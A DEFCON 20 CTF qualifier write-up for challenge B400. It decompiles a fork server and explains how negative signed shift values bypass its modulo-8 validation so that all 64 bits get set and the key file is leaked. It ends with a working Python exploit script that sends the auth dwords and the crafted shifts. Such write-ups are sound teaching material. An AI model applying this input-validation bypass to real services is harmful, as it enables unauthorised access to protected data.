DEFCON 20 CTF Quals B400 writeup "No takebacks! Running on 140.197.217.239:11553" $ file bin400-b5033d3f7205b1996d220df61bf0f25a bin400-b5033d3f7205b1996d220df61bf0f25a: ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked (uses shared libs), for FreeBSD 9.0 (900044), stripped Analyzing the binary in IDA, we see that it's a fork server like most of the other binaries running on DDTEK's servers. The general structure is the same: bind and listen on port 11553, fork on accept() and call the client handler callback (4017F0). Below is the hand decompiled client handler callback: /* http://x-n2o.com/bin400-dc20_decomp.c */ /* http://x-n2o.com/bin400-dc20 */ int send_full(int fd, char *buf, size_t n); /* @ 401370 */ int recv_full(int fd, char *buf, size_t n); /* @ 401470 */ int client_cb(int fd); /* @ 4017F0 */ int client_cb(int fd) { uint *a; int auth; /* client authentication sequence 1 */ a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); auth = little_endian(*a); free(a); if(auth != 0x53794550) return 0; /* client authentication sequence 2 */ a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); auth = little_endian(*a); free(a); if(auth != 0x4a75402c) return 0; /* client authentication sequence 3 */ a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); auth = little_endian(*a); free(a); if(auth != 0x03818a37) return 0; /* client authentication sequence 4 */ a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); auth = little_endian(*a); free(a); if(auth != 0xacf7bc51) return 0; /* generation loop count */ int count; a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); count = little_endian(*a); free(a); if(count == 0) return -2; /* word generation loop - most important */ int last_shift, shift; u64 gen; int i; last_shift = 0; gen = 0; for(i = 0; i != count; i++) { a = malloc(sizeof(uint)); if(a == NULL) exit(0); recv_full(fd, a, sizeof(uint)); shift = little_endian(*a); free(a); if(shift > 63) return -1; if(last != -1) { int valid; switch(shift - last_shift) { case -17: valid = last_shift % 8 > 0; break; case -15: valid = last_shift % 8 <= 6; break; case -10: valid = last_shift % 8 > 1; break; case -6: valid = last_shift % 8 <= 5; break; case +6: valid = last_shift % 8 > 1; break; case +10: valid = last_shift % 8 <= 5; break; case +15: valid = last_shift % 8 > 0; break; case +17: valid = last_shift % 8 <= 6; break; default: return -1; } if(!valid) return -1; } gen ^= 1 << shift; last_shift = shift; } for(i = 0; gen != 0; i++) gen &= gen - 1; if(i != 64) return -2; /* read and send key to client */ FILE *fp; char *key; long klen; fp = fopen("key", "r"); if(fp == NULL) return 0; fseek(fp, 0, SEEK_END); klen = ftell(fp); rewind(fp); k = calloc(1, klen); if(fread(k, 1, klen, fp) != klen) return 0; fclose(fp); send_full(fd, key, klen); return 0; } Our objective is to reach the final part of the subroutine, and have the key sent to us. The final check requires the loop below to be executed 64 times. for(i = 0; gen != 0; i++) gen &= gen - 1; We observe that for different values of gen, the number of times the loop will have executed is equal to the number of set bits in gen. It only makes sense that for the loop to execute 64 times all bits must be set, since it's a qword (64-bits) :) (For various interpretations of similar bit twiddling hacks, see [1], [2]) The core of the problem now becomes setting all bits of the qword. This brings us to the main loop of the subroutine - the qword generation loop. Every iteration of this loop flips a certain bit in the qword: gen ^= 1 << shift; The value of shift (bit position to be flipped) is controlled by us. The loop starts with the qword having all bits cleared, so as long as we flip each bit once, we will obtain our desired qword with all bits set. The pitfall here is that we can select only the first bit position arbitrarily. The subsequent bit positions will have to be a certain offset from the last one sent. As we see in the switch statement, the allowed offsets are -17, -15, -10, -6, +6, +10, +15, +17. Moreover every offset has a set of allowed values of the last shift modulo 8 (a whitelist, if you will :). At this point our problem has turned into a very difficult graph theory problem (if we consider every bit as a node in a graph). I tried to come up with an algorithm to traverse all the nodes, but it was quite difficult and after a few hours I was baffled and decided to try to find an alternate solution. Changing the offsets is impossible, but perhaps one could bypass the second restriction (last_shift % 8) and pick offsets as one sees fit. It turns out that you can completely bypass this restriction for certain offsets and use any combination of them as desired. The key here is that the shift value is signed. It is possible for us to send a negative shift value since no checks are made against it. This means that the remainder (last_shift % 8) can be made negative. This can bypass the second restriction checks for the following offsets in the switch statement: case -15: valid = last_shift % 8 <= 6; break; case -6: valid = last_shift % 8 <= 5; break; case +10: valid = last_shift % 8 <= 5; break; case +17: valid = last_shift % 8 <= 6; break; We can use any combination of these offsets for as long as the shift remains negative. There are many offset sequences one can come up with that will lead to our objective. One such sequence can be obtained by using solely offset -15 or offset +17. These are indeed the most efficient sequences since they are the smallest. We only have to send 63 (either all -15 or all +17) offsets plus the initial shift value, which lead to 64 bit flips in total. How can we be sure that a different bit will be flipped each time? As it turns out, both -15 and +17 are additive generators modulo 64, because they are both relatively prime to 64 (gcd(-15, 64) = 1 and gcd(+17, 64) = 1). This means that after n * (-15) or n * (+17) additions of (-15) or (+17) we will have generated all numbers in [0 .. 63]. Since shifts are analogous to additions and numbers [0 .. 63] to bit positions, and since shifts in x86_64 work in a modular fashion, we can use this property to our advantage. The number n is 64, which we observe in the following congruences: x - 15 * n = x (mod 64) x + 17 * n = x (mod 64) where x is the starting number. Since we already stated that -15 and +17 are relatively prime, n can only be 64. In reality we only need 63 shifts with this offset, since the starting bit is preset. This makes the loop count 63 + 1 = 64 There are two slight restrictions to the initial shift, if our selected sequence is to leave the last shift always negative. We define the 'safe' range of the initial number for offset -15 as [-2^31 + 15 * 63 .. -1], and for offset +17 as [-2^31 .. -1 - 17 * 63]. As you can see, received data is treated as big endian, hence the need for conversion to little endian. 1. 4 hardcoded authentication dwords 2. loop count dword 3. 63 consecutive shift dwords with the selected offset applied (either all -15 or all +17) Working pwnie: #!/usr/bin/env python # http://x-n2o.com/bin400-dc20_pwn.py # http://x-n2o.com/bin400-dc20 import socket import struct # HOST = "140.197.217.239" HOST = "localhost" PORT = 11553 def dword(a): return struct.pack(">I", a) # big-endian s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) # auth dwords s.send(dword(0x53794550)) s.send(dword(0x4A75402C)) s.send(dword(0x03818A37)) s.send(dword(0xACF7BC51)) # loop count s.send(dword(64)) # initial shift shift = -65536 s.send(dword(shift)) # shifts with offset +17 applied for i in range(0, 63): shift += 17 s.send(dword(shift)) print s.recv(8192) s.close() ~ X-N2O [1] Bit Twiddling Hacks - http://graphics.stanford.edu/~seander/bithacks.html [2] Hacker's Delight - http://hackersdelight.org/ http://x-n2o.com/b400-dc20